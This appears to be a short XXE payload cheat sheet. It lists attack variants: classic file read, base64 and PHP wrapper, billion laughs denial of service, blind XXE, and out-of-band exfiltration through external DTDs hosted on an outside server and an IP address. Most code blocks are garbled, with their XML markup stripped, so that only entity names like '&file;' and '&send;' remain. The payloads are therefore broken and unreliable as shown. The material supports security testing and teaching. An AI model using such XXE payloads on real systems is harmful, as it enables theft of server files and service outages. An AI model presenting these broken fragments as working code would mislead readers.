# XML External Entity An XML External Entity attack is a type of attack against an application that parses XML input ## Exploit Basic Test ``` ]> John &example; ``` Classic XXE ``` ]> &file; ``` Classic XXE Base64 encoded ``` %init; ]> ``` PHP Wrapper inside XXE ``` ]> Jean &xxe; Dupont 00 11 22 33 44 42 rue du CTF 75000 Paris ``` Deny Of Service - Billion Laugh Attack ``` ]> &a4; ``` Blind XXE ``` ] > &callhome; ``` XXE OOB Attack (Yunusov, 2013) ``` &send; File stored on http://publicServer.com/parameterEntity_oob.dtd "> %all; ``` XXE OOB with DTD and PHP filter ``` %sp; %param1; ]> &exfil; File stored on http://92.222.81.2/dtd.xml "> ``` ## Thanks to * https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing * http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html